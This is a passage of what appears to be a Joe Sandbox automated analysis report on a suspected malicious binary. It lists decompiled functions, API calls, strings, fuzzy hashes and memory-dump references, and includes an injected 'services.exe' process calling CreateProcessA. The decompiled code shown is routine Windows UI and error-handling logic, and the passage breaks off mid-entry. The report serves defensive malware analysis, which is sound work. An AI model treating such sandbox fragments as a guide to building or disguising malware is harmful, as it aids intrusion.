Opcode ID: 3a63572c1bf175f07c1c96fa97d64699dd3ef849d5b48061a224202752bf72ca
Instruction ID: 26c93a46f6548b496e82e6531aa4d505c4061e094797cb86f066d4fed39adccd
Opcode Fuzzy Hash: 3a63572c1bf175f07c1c96fa97d64699dd3ef849d5b48061a224202752bf72ca
Instruction Fuzzy Hash: 332162712142059FCB089F65D895ABA77E9FF44711B14849EF94A8F296DFB0EC00CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BAEB32 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 00BAEAB3: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BAEAD2
Part of subcall function 00BAEAB3: GetProcAddress.KERNEL32(00BE71C0,CryptUnprotectMemory), ref: 00BAEAE2

GetCurrentProcessId.KERNEL32(?,?,?,00BAEB2C), ref: 00BAEBC4

Strings

CryptProtectMemory failed, xrefs: 00BAEB7B
CryptUnprotectMemory failed, xrefs: 00BAEBBC

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 249f990aa6207ab8797cec04f1d279d898308399c77f7e56f4958de161a7a106
Instruction ID: 72315329256208db1e7021a159b4c1741ca9e15451ff8e2edd7414a77c4870b9
Opcode Fuzzy Hash: 249f990aa6207ab8797cec04f1d279d898308399c77f7e56f4958de161a7a106
Instruction Fuzzy Hash: 92113332A0D2646BDB155B20DC9AA6E3BC4EF16720B4840DAF8236B281DF34ED0087E1

Uniqueness

Uniqueness Score: -1.00%

Function 00BA1241 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 00BA124E

Strings

A, xrefs: 00BA127B

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Malloc
String ID: A
API String ID: 2696272793-3554254475
Opcode ID: 18a7c3517fc95ee9a3baba5aa199798735756c0b1bbb02234638a8e3ea63e56e
Instruction ID: 4454cf466414fc861ccc91523dd903fb970174ef83dfb455a17ebfe7b7119557
Opcode Fuzzy Hash: 18a7c3517fc95ee9a3baba5aa199798735756c0b1bbb02234638a8e3ea63e56e
Instruction Fuzzy Hash: 4111FA75904219ABCB10CFA8E845AEEBBF8EF49310B1545AAED05E7200DB35DA44DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BA130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00BA130B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E00BAD9B1(0xbdfee8, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E00BAD9D8(0xbdfee8, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0xc01154(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0xbd25b4);
								}
							}
						}
					}
				}
				return 0;
			}

0x00ba1312
0x00ba1375
0x00ba1314
0x00ba1314
0x00ba131b
0x00ba1331
0x00ba133a
0x00ba133f
0x00ba1347
0x00ba134f
0x00ba1357
0x00ba1365
0x00ba1365
0x00ba1357
0x00ba1347
0x00ba133a
0x00ba131b
0x00ba137d

APIs

Part of subcall function 00BAD9D8: _swprintf.LIBCMT ref: 00BAD9FE
Part of subcall function 00BAD9D8: _strlen.LIBCMT ref: 00BADA1F
Part of subcall function 00BAD9D8: SetDlgItemTextW.USER32(?,00BDD154,?), ref: 00BADA7F
Part of subcall function 00BAD9D8: GetWindowRect.USER32(?,?), ref: 00BADAB9
Part of subcall function 00BAD9D8: GetClientRect.USER32(?,?), ref: 00BADAC5

GetDlgItem.USER32(00000000,00003021), ref: 00BA134F
SetWindowTextW.USER32(00000000,00BD25B4), ref: 00BA1365

Strings

0, xrefs: 00BA130E

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 2e215748cd962d9922653f2a8b1a58bd248088d41765f997beb58768621d2599
Instruction ID: cb294ac08d5763a14b1a8e5e8537a921502c085a06a998af88b085550a9d13e5
Opcode Fuzzy Hash: 2e215748cd962d9922653f2a8b1a58bd248088d41765f997beb58768621d2599
Instruction Fuzzy Hash: E2F0AF31108248B7DF698F649C09BEE7BE8EB26345F0C8894FD4654AA1C774C990EA24

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00BB9730(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, long* _a16) {
				void* __edi;
				void* _t10;
				void* _t17;
				long* _t18;

				_t18 = _a16;
				_t10 = _a8 - 1;
				if(_t10 == 0) {
					GetWindowLongW(_a4, 0xffffffeb);
					E00BB8F06(_t17, _t18, __eflags, _a4);
				} else {
					if(_t10 == 0x80) {
						SetWindowLongW(_a4, 0xffffffeb,  *_t18);
					}
				}
				return  *0xc01120(_a4, _a8, _a12, _t18);
			}

0x00bb9737
0x00bb973a
0x00bb973d
0x00bb975a
0x00bb9765
0x00bb973f
0x00bb9744
0x00bb974d
0x00bb974d
0x00bb9744
0x00bb977c

APIs

SetWindowLongW.USER32(?,000000EB,?), ref: 00BB974D
GetWindowLongW.USER32(?,000000EB), ref: 00BB975A

Strings

t, xrefs: 00BB975A

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: LongWindow
String ID: t
API String ID: 1378638983-2238339752
Opcode ID: 79fc77b2c8e75143efa03c597c0e5e76870c03f01857297a5115774c4c49f5a4
Instruction ID: d516390fc03bc350b1f083291da51d86cc8ed33d1850617663618846aedbd398
Opcode Fuzzy Hash: 79fc77b2c8e75143efa03c597c0e5e76870c03f01857297a5115774c4c49f5a4
Instruction Fuzzy Hash: B3F0F832004108BBCF055FA9DC08EAD7FAAFB89361F058611FA1695170CB71D960EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BB07AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00BB07AC(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E00BA6E21(E00BA6E26(_t6, 0xbdff50, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0xbdff50, 0xbdff50, 2);
				}
				return _t2;
			}

0x00bb07ac
0x00bb07b2
0x00bb07bb
0x00bb07c4
0x00000000
0x00bb07e3
0x00bb07e4

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00BB08CB,?,?,00BB094F,?,?,?,?,?,00BB0939), ref: 00BB07B2
GetLastError.KERNEL32(?,?,00BB094F,?,?,?,?,?,00BB0939), ref: 00BB07BE

Part of subcall function 00BA6E26: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA6E44

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00BB07C7

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 3eeeeaa386e07890acde28052ec99b2a2dc88e7ddca389972cddc58e5c5a5489
Instruction ID: f3af0ac6808768e7e726c6785fdb6249f0b958ffaef3c7bad5ca5f723f5d3bc6
Opcode Fuzzy Hash: 3eeeeaa386e07890acde28052ec99b2a2dc88e7ddca389972cddc58e5c5a5489
Instruction Fuzzy Hash: 1ED05B7250D02177D90033749C19EBFBF86DB62730B244796F239552F5DE200D418596

Uniqueness

Uniqueness Score: -1.00%

Function 00BAD98E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BAD98E(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}

0x00bad991
0x00bad9a1
0x00bad9a9
0x00bad9ab
0x00000000
0x00bad9ab
0x00bad9b0

APIs

GetModuleHandleW.KERNEL32(00000000,?,00BAD26F,?), ref: 00BAD993
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00BAD26F,?), ref: 00BAD9A1

Strings

RTL, xrefs: 00BAD99B

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 973cfadadea7991326658e915ceba20b892379edec4c4d3f61ca5686a75f970c
Instruction ID: 6355df867f004b1bb2a16a5ce02added9bad4d4b358a355d6f64f43ac40f1eeb
Opcode Fuzzy Hash: 973cfadadea7991326658e915ceba20b892379edec4c4d3f61ca5686a75f970c
Instruction Fuzzy Hash: 3DC0123124679166D73437606C1DB43AA886B61B11F05049AB141DA1E0E9A5C441C650

Uniqueness

Uniqueness Score: -1.00%

Function 00BAD9B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BAD9B1(void* __ecx, struct HWND__* _a4) {
				void* _t4;

				if( *((char*)(__ecx + 0x64)) != 0) {
					return SetWindowLongW(_a4, 0xffffffec, GetWindowLongW(_a4, 0xffffffec) | 0x00400000);
				}
				return _t4;
			}

0x00bad9b5
0x00000000
0x00bad9cf
0x00bad9d5

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00BAD9BD
SetWindowLongW.USER32(00000030,000000EC,00000000), ref: 00BAD9CF

Strings

t, xrefs: 00BAD9BD

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: LongWindow
String ID: t
API String ID: 1378638983-2238339752
Opcode ID: 00acecc9849581bef92a67cbb1201dd39d5a3b8f1347412f4e5f05dfbb3d8431
Instruction ID: 333ba19d29aa688a99d17287848d1883f8edc39414a953d4c340c31bf096173a
Opcode Fuzzy Hash: 00acecc9849581bef92a67cbb1201dd39d5a3b8f1347412f4e5f05dfbb3d8431
Instruction Fuzzy Hash: 76D0C97000C140BBEB056714DC08F1EBE94AB82325F258765B5A2A00F5C3318451C644

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: services.exePID: 6556, Parent PID: 684COMMON

Execution Graph

Execution Coverage:	36.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	23
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 05DD0747 Relevance: .4, Instructions: 387
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.727249317.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5dd0000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 662c3ce1427b2cabb3da7e011e4dd1eecefdc3357ce5201b054e69d016ad6ad0
Instruction ID: dd72055e4a269be4ed8bacd5d1906e65d67ef719c05aa90f8dece48d3e10dd80
Opcode Fuzzy Hash: 662c3ce1427b2cabb3da7e011e4dd1eecefdc3357ce5201b054e69d016ad6ad0
Instruction Fuzzy Hash: 66F13A74E002188FDB24CBA8C884BADF7F6BF89310F1581AAD509AB355DB719D46CF61

Uniqueness

Uniqueness Score: -1.00%

Function 019EA448 Relevance: 1.6, APIs: 1, Instructions: 145
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000E2C), ref: 019EA579

Memory Dump Source

Source File: 0000000E.00000002.550851579.00000000019EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19ea000_services.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3a09e88749df4c1cb8c8fc00f26bb6affe4f54725f451689fd392ef0436ac865
Instruction ID: a96182e108f9e3df574b1880628381a5bb16b61637e28d1484426788619cf941
Opcode Fuzzy Hash: 3a09e88749df4c1cb8c8fc00f26bb6affe4f54725f451689fd392ef0436ac865
Instruction Fuzzy Hash: 835182721083806FE7238B25CC55FA6BFF8AF06710F0945DBE585CB1A3E265A949C761

Uniqueness

Uniqueness Score: -1.00%

Function 019EA4AE Relevance: 1.6, APIs: 1, Instructions: 99
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000E2C), ref: 019EA579

Memory Dump Source

Source File: 0000000E.00000002.550851579.00000000019EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19ea000_services.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a8973f61cb28a3a3d605a3ef41064a7a4d231f8a05009cd0b17f6a2cc40e41ad
Instruction ID: 1835ea5761feeeb92316746d2d3c3e7502d97e4274b1c76c0853c5247daf0174
Opcode Fuzzy Hash: a8973f61cb28a3a3d605a3ef41064a7a4d231f8a05009cd0b17f6a2cc40e41ad
Instruction Fuzzy Hash: 91318E72140204AFE722CB55CC85FA7FBECEF08711F04895AFA4A8B1A1D675E949CB60

Uniqueness

Uniqueness Score: -1.00%

Function 019EA23C Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(?), ref: 019EA290

Memory Dump Source

Source File: 0000000E.00000002.550851579.00000000019EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19ea000_services.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 82082391aa674041fd2a4bf35ddccdc621ede0847f9cf068ceed45b04b4058c3
Instruction ID: f2242f7b95dc5e50127a3218aa2728532d1998e41699c8d6d5c2f2eed80ceee4
Opcode Fuzzy Hash: 82082391aa674041fd2a4bf35ddccdc621ede0847f9cf068ceed45b04b4058c3
Instruction Fuzzy Hash: 041161714093C4AFD7128B15DC54B62FFB8EF46625F0880DAED898F263D275A808CB72

Uniqueness

Uniqueness Score: -1.00%

Function 019EA25E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(?), ref: 019EA290

Memory Dump Source

Source File: 0000000E.00000002.550851579.00000000019EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19ea000_services.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 045cb0984507f920c41d4a70b6929278c4be9e4f43f9eaa2cdfd09de29fed9f8
Instruction ID: 4c2ae080adb138a53b1a990dbe080ae4aef88605b675098e7861c0883578abe6
Opcode Fuzzy Hash: 045cb0984507f920c41d4a70b6929278c4be9e4f43f9eaa2cdfd09de29fed9f8
Instruction Fuzzy Hash: 96F0AF35904644DFDB118F09DD89761FBE4EF44721F08C49ADD495B326D276A408CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 019FA2BE Relevance: .1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5c38ee839cd0087c7322b0e1a8edd91db0094de9b0c5e561295bc3ca1c5f75f
Instruction ID: 116838c8f974c088adc9d2eebdc5616a8750d49ecb02ab6e944cf9b2df621cf4
Opcode Fuzzy Hash: c5c38ee839cd0087c7322b0e1a8edd91db0094de9b0c5e561295bc3ca1c5f75f
Instruction Fuzzy Hash: 72315AB6509340AFD350CF19EC41A56FBE8EB85620F08C96EFD499B211D275A905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 019FA4EF Relevance: .1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73ea62a0b4a83255783990af2e74045b7a0eb9befc1e6cc2969c7fb8b30782e4
Instruction ID: a8b545d557e9e79d86bc5d0f350823fa4ee62c8b4d44e21f99b34c1839ff6267
Opcode Fuzzy Hash: 73ea62a0b4a83255783990af2e74045b7a0eb9befc1e6cc2969c7fb8b30782e4
Instruction Fuzzy Hash: 60316BB6549340AFD310CF19DC4195BFFE8EB89630F18C9AEFD499B211D275A804CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 019FA822 Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff85727634eca4752def3a5a751321990a8fa993b8495e861d5b5db9019ffc6
Instruction ID: 70569c8b270bc7932ac8cb094e47f2f874c1669836f7e7ffaf660893bebba1cc
Opcode Fuzzy Hash: 2ff85727634eca4752def3a5a751321990a8fa993b8495e861d5b5db9019ffc6
Instruction Fuzzy Hash: BD214F76508340AFD350CF15DC45E57FBE8EB89630F08C96EFD499B211D275A804CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 019FA3C4 Relevance: .1, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d809d68c3a00e67fb36258da94b27cb71a654a1bab1b1a32cb66d37119a4c74
Instruction ID: 3934305f6f2e8c6dd98bbbce035fec9b29b7912ce0a2208e0f77d598a8043de0
Opcode Fuzzy Hash: 2d809d68c3a00e67fb36258da94b27cb71a654a1bab1b1a32cb66d37119a4c74
Instruction Fuzzy Hash: D421BF72508340AFD3108F1A9C41D56FFE8EB85630F08C9AEFD499B211D275A404CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 019FA191 Relevance: .1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba939b35500cf52465e5a8f18a03acff57b2f49d75b492dc9f05fcba19188b86
Instruction ID: 0bbe322dd911bdc2868b3361d43e8a74f787e97d8c3436bbe8e716bf32892e0b
Opcode Fuzzy Hash: ba939b35500cf52465e5a8f18a03acff57b2f49d75b492dc9f05fcba19188b86
Instruction Fuzzy Hash: F521A176548340AFD3108F16DC41D56FFE8EB85670F18C96EFD499B611D275A804CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 019FA6F6 Relevance: .1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.550950827.00000000019FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 019FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_19fa000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f82d179b92c64c7e0b71c513dca1f8b346eff484de143cea9bfce79ce0050456
Instruction ID: c2f75a8319e88be7e678bd4e85128d36fa0ec3540235d2759aff889e311ba88f
Opcode Fuzzy Hash: f82d179b92c64c7e0b71c513dca1f8b346eff484de143cea9bfce79ce0050456
Instruction Fuzzy Hash: F221B076508340BFD3108F06AC41D57FFA8EB85630F08C9AFFD499B212D275A804CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 05DD044F Relevance: .1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.727249317.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5dd0000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e4ec0db9dc9172260f8df09ad53901b9fcf59d600c2e1dc5369cc3117a30556
Instruction ID: db5b2cc35b49ba85d244a09bf12374162c2fce6457aadcf1fb4b7040ca8b209d
Opcode Fuzzy Hash: 7e4ec0db9dc9172260f8df09ad53901b9fcf59d600c2e1dc5369cc3117a30556
Instruction Fuzzy Hash: 4F216D35B402059FDB149B78C858BAEBBF2BBCC300F10807AE506EB791DE719C058B90

Uniqueness

Uniqueness Score: -1.00%

Function 05DD0460 Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.727249317.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5dd0000_services.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b838c5a4468eae36dce1aa79a37cf0d8edebbf1fcb4050c349d321afb3646c5
Instruction ID: 7b1249223e7aeb96cd44296a5d2bf68083e0cd40a5a92181ed92d86619196e5c
